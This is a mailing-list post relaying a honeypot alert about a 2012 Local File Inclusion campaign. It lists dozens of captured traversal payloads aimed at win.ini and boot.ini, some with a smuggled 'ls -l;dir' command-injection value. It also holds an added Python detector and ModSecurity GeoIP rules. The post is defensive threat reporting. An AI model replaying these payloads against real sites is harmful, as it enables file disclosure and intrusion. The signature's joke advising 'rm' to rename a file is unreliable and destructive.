[Owasp-natal] [Honeypot Alert] Large Scale LFI Attack From Brazillian Domains

Noilson Caio caiogore at gmail.com
Thursday March 22 16:18:47 UTC 2012


Our web sensors picked up a big uptick in Local File Inclusion (LFI)
attacks today.  We received 3675 attacks that targeted a wide range of
applications all attempting to use directory traversals to access:
Windows\win.ini
boot.ini
Here is a sampling of attack payloads:
GET /forum/index.php?p=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini%00
GET /sites/all/libraries/fckeditor/editor/dialog/fck_spellerpages/spellerpages/controls.html?btnUndo=Undo&misword=1&sugg=&txtsugg=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFolders&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /sites/all/libraries/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=GetFoldersAndFiles&CurrentFolder=/&Type=../../../../../../../../../../windows/win.ini%00
GET /wp-trackback.php?p=..........................................Windowswin.ini%00
GET /take-quiz/index.php?album=../../../../../../../../../../boot.ini%00
GET /forum.php?mod=viewthread&tid=..........................................Windowswin.ini%00
GET /index.php?main_page=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&keyword=x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%3Bls%20-l%3Bdir%3B-l%3Bdir%3B-x%20&search_in_description=1&inc_subcat=1&manufacturers_id=220&page=1&sort=/boot.ini%00
GET /index.php?main_page=site_map&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=site_map&zenid=/boot.ini%00
GET /index.php?main_page=featured_products&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=featured_products&zenid=/boot.ini%00
GET /index.php?main_page=product_info&products_id=638&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=product_info&products_id=638&zenid=/boot.ini%00
GET /index.php?main_page=page&id=1&chapter=0&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=page&id=1&chapter=0&zenid=/boot.ini%00
GET /index.php?main_page=shippinginfo&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=shippinginfo&zenid=/boot.ini%00
GET /index.php?main_page=privacy&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=privacy&zenid=/boot.ini%00
GET /index.php?main_page=conditions&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=conditions&zenid=/boot.ini%00
GET /wp-content/plugins/download-monitor/download.php?id=..........................................Windowswin.ini%00
GET /forums/viewtopic.php?f=11&t=18551&p=444445&hilit=..........................................Windowswin.ini%00
GET /index.php?main_page=contact_us&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=contact_us&zenid=/boot.ini%00
GET /index.php?main_page=gv_faq&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=gv_faq&zenid=/boot.ini%00
GET /index.php?main_page=discount_coupon&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=discount_coupon&zenid=/boot.ini%00
GET /index.php?main_page=unsubscribe&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=unsubscribe&zenid=/boot.ini%00
GET /index.php?main_page=reviews&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=reviews&zenid=/boot.ini%00
GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=product_reviews_info&products_id=638&reviews_id=25&zenid=/boot.ini%00
GET /index.php?main_page=specials&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=specials&zenid=/boot.ini%00
GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=advanced_search_result&search_in_description=1&zenid=p3hpsf70l0q8pg8sar4t8snr46&keyword=/boot.ini%00
GET /index.php?main_page=index&manufacturers_id=303&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&manufacturers_id=303&zenid=/boot.ini%00
GET /index.php?main_page=login&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=login&zenid=/boot.ini%00
GET /index.php?main_page=index&cPath=332&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=index&cPath=332&zenid=/boot.ini%00
GET /index.php?showtopic=..........................................Windowswin.ini%00
GET /index.php?main_page=product_info&products_id=49354&zenid=../../../../../../../../../../../../boot.ini%00
GET /index.php?main_page=product_info&products_id=49354&zenid=/boot.ini%00
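As an added defender-side example (not code from the original alert), the following Python scanner classifies request lines of the kind sampled above: it decodes percent-encoding (including the %5c backslash form), counts traversal depth, notes the %00 null-byte truncation trick, and reports which of the two target files a parameter points at. The sample log lines are constructed for this example, modelled on the payloads above, plus one benign request.

```python
import urllib.parse

# Files the campaign described above tried to read via directory traversal.
TARGET_FILES = ("win.ini", "boot.ini")

def normalize(value):
    """Decode percent-encoding twice (double encoding is common), fold
    backslashes (%5c) to forward slashes and lower-case for matching."""
    decoded = urllib.parse.unquote(urllib.parse.unquote(value))
    return decoded.replace("\\", "/").lower()

def classify_request(request_line):
    """Return one finding per query parameter that points at a target file,
    or an empty list for a request that shows no LFI pattern."""
    parts = request_line.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    query = parts[1].partition("?")[2]
    findings = []
    for pair in query.split("&"):
        name, _, raw = pair.partition("=")
        norm = normalize(raw)
        null_byte = "\x00" in norm                  # %00 truncation trick
        basename = norm.rstrip("\x00").rsplit("/", 1)[-1]
        if basename not in TARGET_FILES:
            continue
        findings.append({
            "param": name,
            "target": basename,
            "traversal_depth": norm.count("../"),   # 0 for the /boot.ini variant
            "null_byte": null_byte,
        })
    return findings

def scan_log(lines):
    """Run classify_request over request lines; return (line, finding) hits."""
    return [(line, f) for line in lines for f in classify_request(line)]

# Constructed sample log lines modelled on the payloads above; the last one is benign.
SAMPLE_LOG = [
    "GET /forum/index.php?p=" + "..%5c" * 8 + "windows%5cwin.ini%00 HTTP/1.1",
    "GET /index.php?main_page=site_map&zenid=" + "../" * 12 + "boot.ini%00 HTTP/1.1",
    "GET /index.php?main_page=site_map&zenid=/boot.ini%00 HTTP/1.1",
    "GET /index.php?main_page=site_map&zenid=p3hpsf70l0q8pg8sar4t8snr46 HTTP/1.1",
]

if __name__ == "__main__":
    for line, finding in scan_log(SAMPLE_LOG):
        print(finding, "<-", line)
```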


We identified this attack through two methods of our commercial rules feed:
- LFI virtual patching rules
- A big increase in unique malicious IP addresses (for our IP Reputation
  Feed).  We normally have between 500-800 IP addresses in our list per day.
  Today's IP Reputation Blacklist jumped up to 2339.
After analyzing the source IP addresses, it was clear that this LFI attack
campaign was orchestrated by attacker(s) in Brazil.  Here is a listing of
the Brazilian domains we identified:
Assigning Risk Scores
If you are using ModSecurity to protect your web applications, and your
user-base does not normally originate in Brazil, you may want to consider
implementing some GeoIP rules to help raise the potential Threat Score.

SecGeoLookupDb /path/to/apache/conf/base_rules/GeoLiteCity.dat

SecRule REMOTE_ADDR "@geoLookup" "phase:1,t:none,nolog,pass"

SecRule GEO:COUNTRY_CODE "@pm BR" "phase:1,t:none,log,pass,msg:'High Risk Source Location',setvar:tx.threat_score=+10"

This would raise the Threat Score for this transaction.  You could,
however, even block based solely on this information if you were sure that
you have no legitimate clients from this geographic location.  Simply
change the "pass" action to "block".

-- 
"I want to know how to rename a file," he says.
Please, it's payday, isn't it?! But I'm in a good mood.
"Sure. Just run 'rm' and the file name."
"Thanks."

Noilson Caio T. de Araújo
Linux Professional Institute Certification
LPI000182893
Novell Certified Linux Administrator (CLA)
10111916
Novell Data Center Technical Specialist
http://ncaio.ithub.com.br
http://www.commandlinefu.com/commands/by/ncaio
http://www.dicas-l.com.br/autores/noilsoncaioteixeiradearaujo.php